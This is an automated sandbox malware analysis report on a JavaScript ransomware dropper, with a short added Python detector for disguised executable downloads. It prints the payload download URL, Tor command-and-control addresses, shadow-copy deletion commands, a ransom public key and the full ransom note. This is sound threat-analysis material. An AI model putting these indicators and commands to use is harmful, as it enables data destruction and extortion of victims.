
Analysis Report 21о заказе.js

Overview

General Information

Joe Sandbox Version: 25.0.0
Analysis ID: 773096
Start date: 29.01.2019
Start time: 15:03:56
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 18m 51s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 21о заказе.js
Cookbook file name: default-e00499e21f9dcf77fc990400b8b3c2b5.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.troj.evad.winJS@16/229@12/11
EGA Information:
  • Successful, ratio: 75%
HCA Information:
  • Successful, ratio: 51%
  • Number of executed functions: 125
  • Number of non-executed functions: 134
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .js
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, wermgr.exe, conhost.exe, CompatTelRunner.exe, VSSVC.exe, svchost.exe
  • Execution Graph export aborted for target wscript.exe, PID 3920 because there are no executed functions
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Report size getting too big, too many NtWriteFile calls found.

Detection

Strategy  | Score | Range   | Reporting      | Whitelisted | Detection
Threshold | 100   | 0 - 100 | Report FP / FN | false       | malicious

Confidence

Strategy  | Score | Range | Further Analysis Required? | Confidence
Threshold | 5     | 0 - 5 | false                      |


Classification

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Techniques are listed per tactic. Bracketed digits are the signature hit counts the report shows as superscripts after a technique; the extraction ran adjacent superscripts together, so a value such as [111] may be several counts rather than one number.

Initial Access: Valid Accounts, Replication Through Removable Media, Drive-by Compromise, Exploit Public-Facing Application, Spearphishing Link, Spearphishing Attachment, Spearphishing via Service
Execution: Scripting [11], Service Execution, Windows Management Instrumentation, Scheduled Task, Command-Line Interface, Graphical User Interface, Scripting
Persistence: Registry Run Keys / Start Folder [1], Port Monitors, Accessibility Features, System Firmware, Shortcut Modification, Modify Existing Service, Path Interception
Privilege Escalation: Process Injection [111], Accessibility Features, Path Interception, DLL Search Order Hijacking, File System Permissions Weakness, New Service, Scheduled Task
Defense Evasion: Masquerading [1], Disabling Security Tools [1], Process Injection [111], Scripting [11], File Deletion [1], Obfuscated Files or Information [3], Software Packing
Credential Access: Input Capture [21], Network Sniffing, Input Capture, Credentials in Files, Account Manipulation, Brute Force, Two-Factor Authentication Interception
Discovery: Process Discovery [2], Account Discovery [1], Security Software Discovery [31], Remote System Discovery [1], System Network Configuration Discovery [1], File and Directory Discovery [1], System Information Discovery [13]
Lateral Movement: Application Deployment Software, Remote Services, Windows Remote Management, Logon Scripts, Shared Webroot, Third-party Software, Pass the Hash
Collection: Input Capture [21], Clipboard Data [1], Data from Network Shared Drive, Input Capture, Data Staged, Screen Capture, Email Collection
Exfiltration: Data Encrypted [2], Exfiltration Over Other Network Medium, Automated Exfiltration, Data Encrypted, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over Command and Control Channel
Command and Control: Data Obfuscation [1], Uncommonly Used Port [1], Standard Cryptographic Protocol [2], Standard Non-Application Layer Protocol [3], Standard Application Layer Protocol [23], Connection Proxy [2], Uncommonly Used Port

Signature Overview



Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp, Code function: 6_2_00525289 CryptAcquireContextA,GetLastError,CryptGenRandom,6_2_00525289
Public key (encryption) found
Source: rad8AE2B.tmp, Binary or memory string: -----BEGIN PUBLIC KEY-----

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp, Code function: 6_2_005685CE __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_005685CE
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp, Code function: 6_2_00416D6D _memset,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,6_2_00416D6D
Contains functionality to query local drives
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp, Code function: 6_2_00416AEC _memset,_memset,GetLogicalDriveStringsW,GetSystemDirectoryW,GetDriveTypeW,GetDriveTypeW,6_2_00416AEC

Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic, TCP traffic: 192.168.1.103:50028 -> 71.19.157.127:993
Source: global traffic, TCP traffic: 192.168.1.103:50029 -> 51.15.145.150:9001
Downloads files with wrong headers with respect to MIME Content-Type
Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 29 Jan 2019 14:05:19 GMT Server: Apache Last-Modified: Mon, 28 Jan 2019 15:58:59 GMT ETag: "f742856-17b6c8-58086c134f6c0" Accept-Ranges: bytes Content-Length: 1554120 Keep-Alive: timeout=10, max=50 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8c 36 50 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 62 16 00 00 48 01 00 00 00 00 00 20 61 16 00 00 10 00 00 00 80 16 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 20 00 00 02 00 00 38 59 18 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 0
Found Tor onion address
Source: rad8AE2B.tmp, 00000006.00000002.9856441076.000000000387B000.00000004.sdmp, String found in binary or memory: xzclh6fd.onion/prog.php
Source: rad8AE2B.tmp, 00000006.00000002.9856441076.000000000387B000.00000004.sdmp, String found in binary or memory: /prog.phpxzclh6fd.onion/prog.php\amd64_microsoft-windows-mccs-syncres.resources_31bf3856ad364e35_10.0.17134.165_lt-lt_7b9145e0b29da4d9\SyncRes.dll.mui
Source: rad8AE2B.tmp, 00000006.00000002.9857834522.0000000003972000.00000004.sdmp, String found in binary or memory: /prog.phpxzclh6fd.onion/prog.phpce Kevin\Local Settings\Microsoft\Windows\WebCache\OQY4NVYa-eGw1myEdDcZRqIAmmR0f4-aFjDcakUEHFo=.6C39D71348CD950D5B0C
Source: rad8AE2B.tmp, 00000006.00000002.9867612852.0000000003CE6000.00000004.sdmp, String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/
Source: rad8AE2B.tmp, 00000006.00000002.9876914002.0000000003F7C000.00000004.sdmp, String found in binary or memory: http://cryptsen7fo43rr6.onion/
Source: rad8AE2B.tmp, 00000006.00000003.9329215013.0000000004C27000.00000004.sdmp, String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.php
Source: rad8AE2B.tmp, 00000006.00000003.9329215013.0000000004C27000.00000004.sdmp, String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.phpCqIV
Source: rad8AE2B.tmp, 00000006.00000003.9332897305.0000000004209000.00000004.sdmp, String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.phpZN1s=n)1
Source: rad8AE2B.tmp, 00000006.00000003.9335474582.0000000004A85000.00000004.sdmp, String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.phpq
Source: rad8AE2B.tmp, 00000006.00000003.9364568465.0000000004209000.00000004.sdmp, String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.phpe
Source: rad8AE2B.tmp, 00000006.00000003.9458108325.0000000004209000.00000004.sdmp, String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.php9R6M=B
May check the online IP address of the machine
Source: unknown, DNS query: name: whatismyipaddress.com (50 identical queries logged)
Source: unknown, DNS query: name: whatsmyip.net (3 identical queries logged)
Connects to IPs without corresponding DNS lookups
Source: unknown, TCP traffic detected without corresponding DNS query: 193.23.244.244 (50 identical events logged)
Downloads executable code via HTTP
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Jan 2019 14:05:19 GMTServer: ApacheLast-Modified: Mon, 28 Jan 2019 15:58:59 GMTETag: "f742856-17b6c8-58086c134f6c0"Accept-Ranges: bytesContent-Length: 1554120Keep-Alive: timeout=10, max=50Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8c 36 50 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 62 16 00 00 48 01 00 00 00 00 00 20 61 16 00 00 10 00 00 00 80 16 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 20 00 00 02 00 00 38 59 18 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic, HTTP traffic detected: GET /poshpebbles/images/messg.jpg HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: poshpebbles.net Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 Host: whatismyipaddress.com Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 (10 identical requests logged)
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 Host: whatsmyip.net Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Downloads files from webservers via HTTP
Source: global traffic, HTTP traffic detected: GET /poshpebbles/images/messg.jpg HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: poshpebbles.net Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 Host: whatismyipaddress.com Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 (10 identical requests logged)
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 Host: whatsmyip.net Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Found strings which match to known social media urls
Source: csrss.exe, 0000000A.00000002.9075025879.0000000003CCA000.00000004.sdmp, String found in binary or memory: ww.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Source: rad8AE2B.tmp, csrss.exe, 00000007.00000002.8957279020.0000000000400000.00000040.sdmp, csrss.exe, 0000000A.00000002.9032107262.0000000000400000.00000040.sdmp, String found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmp, csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmp, csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmp, String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: rad8AE2B.tmp, 00000006.00000002.9855962211.00000000037B0000.00000004.sdmp, String found in binary or memory: www.yahoo.comej equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown, DNS traffic detected: queries for: poshpebbles.net
Urls found in memory or binary data
Source: rad8AE2B.tmp, 00000006.00000002.9867612852.0000000003CE6000.00000004.sdmp, String found in binary or memory: http://a4ad4ip2xzclh6fd.onion
Source: rad8AE2B.tmp, 00000006.00000002.9867612852.0000000003CE6000.00000004.sdmp, String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/
Source: rad8AE2B.tmp, 00000006.00000003.9329215013.0000000004C27000.00000004.sdmp, String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.php
Source: rad8AE2B.tmp, 00000006.00000003.9458108325.0000000004209000.00000004.sdmp, String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.php9R6M=B
Source: rad8AE2B.tmp, 00000006.00000003.9329215013.0000000004C27000.00000004.sdmp, String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.phpCqIV
Source: rad8AE2B.tmp, 00000006.00000003.9332897305.0000000004209000.00000004.sdmp, String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.phpZN1s=n)1
Source: rad8AE2B.tmp, 00000006.00000003.9364568465.0000000004209000.00000004.sdmp, String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.phpe
Source: rad8AE2B.tmp, 00000006.00000003.9335474582.0000000004A85000.00000004.sdmp, String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/prog.phpq
Source: rad8AE2B.tmp, 00000006.00000002.9817520638.00000000005E5000.00000040.sdmp, csrss.exe, 00000007.00000002.8969607892.00000000005E5000.00000040.sdmp, csrss.exe, 0000000A.00000002.9035702562.00000000005E5000.00000040.sdmp, String found in binary or memory: http://a4ad4ip2xzclh6fd.onionreg.phpprog.phperr.phpcmd.phpsys.phpshd.phpmail.php?&v=b=i=k=ss=e=c=f=s
Source: rad8AE2B.tmp, 00000006.00000003.9337968268.0000000004870000.00000004.sdmp, String found in binary or memory: http://cryptsen7fo43rr6.onion.cab/
Source: rad8AE2B.tmp, 00000006.00000002.9876914002.0000000003F7C000.00000004.sdmp, String found in binary or memory: http://cryptsen7fo43rr6.onion.cab/A
Source: rad8AE2B.tmp, 00000006.00000003.9337968268.0000000004870000.00000004.sdmp, String found in binary or memory: http://cryptsen7fo43rr6.onion.cab/f
Source: rad8AE2B.tmp, 00000006.00000003.9337968268.0000000004870000.00000004.sdmp, String found in binary or memory: http://cryptsen7fo43rr6.onion.cab/p
Source: rad8AE2B.tmp, 00000006.00000002.9876914002.0000000003F7C000.00000004.sdmp, String found in binary or memory: http://cryptsen7fo43rr6.onion.to/
Source: rad8AE2B.tmp, 00000006.00000002.9876914002.0000000003F7C000.00000004.sdmp, String found in binary or memory: http://cryptsen7fo43rr6.onion/
Source: wscript.exe, 00000001.00000002.8648989578.0000000002DAA000.00000004.sdmp, wscript.exe, 00000001.00000003.8642289372.0000000004F42000.00000004.sdmp, String found in binary or memory: http://poshpebbles.net/poshpebbles/images/messg.jpg
Source: wscript.exe, 00000001.00000003.8642289372.0000000004F42000.00000004.sdmp, String found in binary or memory: http://poshpebbles.net/poshpebbles/images/messg.jpgic
Source: rad8AE2B.tmp, csrss.exe, 00000007.00000002.8969607892.00000000005E5000.00000040.sdmp, csrss.exe, 0000000A.00000002.9035702562.00000000005E5000.00000040.sdmp, String found in binary or memory: http://whatismyipaddress.com/
Source: rad8AE2B.tmp, 00000006.00000002.9817520638.00000000005E5000.00000040.sdmp, csrss.exe, 00000007.00000002.8969607892.00000000005E5000.00000040.sdmp, csrss.exe, 0000000A.00000002.9035702562.00000000005E5000.00000040.sdmp, String found in binary or memory: http://whatismyipaddress.com///whatismyipaddress.com/ip/Click
Source: csrss.exe, 0000000A.00000002.9035702562.00000000005E5000.00000040.sdmp, String found in binary or memory: http://whatsmyip.net/
Source: rad8AE2B.tmp, csrss.exe, 00000007.00000002.8957279020.0000000000400000.00000040.sdmp, csrss.exe, 0000000A.00000002.9032107262.0000000000400000.00000040.sdmp, String found in binary or memory: http://www.openssl.org/support/faq.html
Source: rad8AE2B.tmp, 00000006.00000002.9800706398.0000000000400000.00000040.sdmp, csrss.exe, 00000007.00000002.8957279020.0000000000400000.00000040.sdmp, csrss.exe, 0000000A.00000002.9032107262.0000000000400000.00000040.sdmp, String found in binary or memory: http://www.openssl.org/support/faq.html.
Source: wscript.exe, 00000001.00000002.8648989578.0000000002DAA000.00000004.sdmp, String found in binary or memory: https://login.live.com
Source: rad8AE2B.tmp, rad8AE2B.tmp, 00000006.00000002.9800706398.0000000000400000.00000040.sdmp, csrss.exe, 00000007.00000002.8957279020.0000000000400000.00000040.sdmp, csrss.exe, 0000000A.00000002.9032107262.0000000000400000.00000040.sdmp, String found in binary or memory: https://www.torproject.org/
Source: rad8AE2B.tmp, 00000006.00000003.9337968268.0000000004870000.00000004.sdmp, String found in binary or memory: https://www.torproject.org/download/download-easy.html.en
Uses HTTPS
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown, Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 50030
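The signatures "Downloads files with wrong headers with respect to MIME Content-Type" and "Downloads executable code via HTTP" rest on one check: the server declared image/jpeg while the body begins with an MZ stub that points at a valid PE signature. The following is an added example, not Joe Sandbox code and not part of the report, that performs that check offline. PE_PREFIX is the start of the messg.jpg body copied from the report's hex dump; SAMPLE_RESPONSE reuses a trimmed copy of the response headers shown above; JPEG_RESPONSE is a constructed control case; the magic table and all function names are the example's own.

```python
"""Flag an HTTP response whose declared Content-Type disagrees with the body's magic
bytes, and pull the basic COFF header fields when the body is a PE file.
Added example for this report, not Joe Sandbox code."""
import struct
from datetime import datetime, timezone

# First 140 bytes of the downloaded "image", as dumped in the report (offsets in comments).
PE_PREFIX = bytes.fromhex(
    "4d5a90000300000004000000ffff0000"  # 0x00  e_magic 'MZ'
    "b8000000000000004000000000000000"  # 0x10
    "00000000000000000000000000000000"  # 0x20
    "00000000000000000000000080000000"  # 0x30  e_lfanew = 0x80
    "0e1fba0e00b409cd21b8014ccd215468"  # 0x40  DOS stub: "This program cannot be run in DOS mode."
    "69732070726f6772616d2063616e6e6f"  # 0x50
    "742062652072756e20696e20444f5320"  # 0x60
    "6d6f64652e0d0d0a2400000000000000"  # 0x70
    "504500004c0103008c36505c"          # 0x80  'PE\0\0', Machine, NumberOfSections, TimeDateStamp
)

# Headers copied (trimmed) from the response in the report; body cut where the dump ends.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Tue, 29 Jan 2019 14:05:19 GMT\r\n"
    b"Server: Apache\r\n"
    b"Content-Length: 1554120\r\n"
    b"Content-Type: image/jpeg\r\n"
    b"\r\n"
) + PE_PREFIX

# Constructed control case: a response whose body really is a JPEG.
JPEG_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: image/jpeg\r\n\r\n"
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01"
)

# (magic bytes at offset 0, MIME type the body actually is). Small on purpose.
MAGIC = [
    (b"MZ", "application/x-dosexec"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF8", "image/gif"),
    (b"%PDF-", "application/pdf"),
    (b"PK\x03\x04", "application/zip"),
]


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def pe_header_summary(body):
    """Machine, NumberOfSections and TimeDateStamp from the COFF header, or None
    when e_lfanew does not point at a 'PE\\0\\0' signature inside the buffer."""
    if len(body) < 0x40:
        return None
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    if body[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(body) < e_lfanew + 12:
        return None
    machine, nsections, stamp = struct.unpack_from("<HHI", body, e_lfanew + 4)
    return {
        "machine": machine,          # 0x14c = IMAGE_FILE_MACHINE_I386
        "sections": nsections,
        "timestamp": stamp,
        "compiled_utc": datetime.fromtimestamp(stamp, timezone.utc).isoformat(),
    }


def sniff_type(body):
    """Guess the real MIME type from magic bytes; None if nothing matched."""
    for magic, mime in MAGIC:
        if body.startswith(magic):
            if mime == "application/x-dosexec" and pe_header_summary(body) is None:
                return "application/x-msdos-program"  # MZ stub without a PE header
            return mime
    return None


def check_mime(raw):
    """Compare the declared Content-Type with the sniffed type; 'mismatch' is the alert."""
    _, headers, body = parse_response(raw)
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    actual = sniff_type(body)
    return {
        "declared": declared,
        "actual": actual,
        "mismatch": actual is not None and actual != declared,
        "pe": pe_header_summary(body) if actual == "application/x-dosexec" else None,
    }


if __name__ == "__main__":
    for name, raw in (("messg.jpg", SAMPLE_RESPONSE), ("control", JPEG_RESPONSE)):
        print(name, check_mime(raw))
```

The COFF TimeDateStamp in the dump decodes to 2019-01-29 11:18 UTC, a few hours before the sandbox fetched the file, which is worth recording alongside the mismatch when triaging the download.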

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\ProgramData\Windows\csrss.exe, Code function: 10_1_00566120 EntryPoint,OemKeyScan,GetEnhMetaFileW,GetActiveWindow,GetOpenClipboardWindow,AnyPopup,GetCaretBlinkTime,PathToRegion,CopyIcon,GetDC,IsCharAlphaNumericA,GetAsyncKeyState,GdiFlush,CloseEnhMetaFile,GetColorSpace,ShowCaret,GetThreadDesktop,VkKeyScanA,GetForegroundWindow,AddFontResourceA,CloseWindow,BeginPath,CloseFigure,GetTextCharset,CreateMetaFileA,GetQueueStatus,GetMenuContextHelpId,DestroyIcon,GetInputState,GetActiveWindow,CancelDC,GetClipboardSequenceNumber,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExW,10_1_00566120
Contains functionality to retrieve information about pressed keystrokes
Source: C:\ProgramData\Windows\csrss.exe, Code function: 10_1_00566120 EntryPoint,OemKeyScan,GetEnhMetaFileW,GetActiveWindow,GetOpenClipboardWindow,AnyPopup,GetCaretBlinkTime,PathToRegion,CopyIcon,GetDC,IsCharAlphaNumericA,GetAsyncKeyState,GdiFlush,CloseEnhMetaFile,GetColorSpace,ShowCaret,GetThreadDesktop,VkKeyScanA,GetForegroundWindow,AddFontResourceA,CloseWindow,BeginPath,CloseFigure,GetTextCharset,CreateMetaFileA,GetQueueStatus,GetMenuContextHelpId,DestroyIcon,GetInputState,GetActiveWindow,CancelDC,GetClipboardSequenceNumber,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExW,10_1_00566120
Creates a DirectInput object (often for capturing keystrokes)
Source: rad8AE2B.tmp, 00000006.00000002.9829836774.0000000000920000.00000004.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to change the wallpaper
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp, Code function: 6_2_0040AC3A __EH_prolog,_memset,SystemParametersInfoW,SystemParametersInfoW,6_2_0040AC3A
Deletes shadow drive data (may be related to ransomware)
Source: rad8AE2B.tmp, 00000006.00000002.9817520638.00000000005E5000.00000040.sdmp, Binary or memory string: vssadmin.exediskshadow.exeList ShadowsDelete Shadows /All /QuietDELETE SHADOWS ALLrunas/s ROOT\CIMV2WQLAVAST
Source: csrss.exe, 00000007.00000002.8969607892.00000000005E5000.00000040.sdmp, Binary or memory string: vssadmin.exediskshadow.exeList ShadowsDelete Shadows /All /QuietDELETE SHADOWS ALLrunas/s ROOT\CIMV2WQLAVAST
Source: csrss.exe, 0000000A.00000002.9035702562.00000000005E5000.00000040.sdmp, Binary or memory string: vssadmin.exediskshadow.exeList ShadowsDelete Shadows /All /QuietDELETE SHADOWS ALLrunas/s ROOT\CIMV2WQLAVAST
Source: vssadmin.exe, 0000000B.00000002.9235529825.0000014252810000.00000002.sdmp, Binary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe, 0000000B.00000002.9235529825.0000014252810000.00000002.sdmp, Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe, 0000000B.00000002.9235529825.0000014252810000.00000002.sdmp, Binary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe, 0000000B.00000002.9235529825.0000014252810000.00000002.sdmp, Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe, 0000000B.00000002.9235529825.0000014252810000.00000002.sdmp, Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
May disable shadow drive data (uses vssadmin)
Source: unknown, Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe List Shadows
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp, Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe List Shadows
Stores a public key to the registry (likely related to ransomware)Show sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\System32\Configuration xpk -----BEGIN PUBLIC KEY-----.MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAuMvPzsg9YKThUzNOe0gu.ocFHkb/ddeVcFM9hvxOdSlW+IC3ufEPm2Lk8WyGM/YmbWKYF5IY4vARgECNRgBdA.YQUgOU01lHaATshh/naVOAloTyjMfzGhyOpqW4BT+YZ9Zd6AmpAQred1k6iLnqmn.ojKRGJBqgk+VSw+wVGEmUOUkuRqruBrwbYjuJ+akjKpgxRiKwvKrEd4Uz7g/o316.vXngIatV+AOvvNOqmmq4HmA/VoUN067qrYBdTSrWEShuCzEKRyzvt96O5i2HhSTK.kJ2oun+Atfjy7TZ0V06pfh7sqcJxgCgwtyOXeAfcBnX/XpLuZL6/n0n/If9uSSuY.ajt0Ym8w2YPbWYOima4uSpmG3hU7pUZXdg3pyHwUCQHeK8gj1nWs/yZ5uczMJCyj.Yvqkb2ci1l5L63nqmsXziM70zF7JhybItPZJBzXjZ8Jds07jpGrD+fcATVNXe8K0.AEb3o0eTI8WTWjgLJJ+H6LlloBAzP/lZYm0Y2rYVgc8PAgMBAAE=.-----END PUBLIC KEY-----.Jump to behavior
Writes a notice file (html or txt) to demand a ransomShow sources
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README1.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmpFile dropped: C:\README2.txt -> decrypt the files you should send the following code:6c39d71348cd950d5b0c|0to e-mail address pilotpilot088@gmail.com .then you will receive all necessary instructions.all the attempts of decryption by yourself will result only in irrevocable loss of your data.if you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.if you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. you can do it by two ways:1) download tor browser from here:https://www.torproject.org/download/download-easy.html.eninstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/press enter and then the page with feedback form will be loaded.2) go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/Jump to dropped file
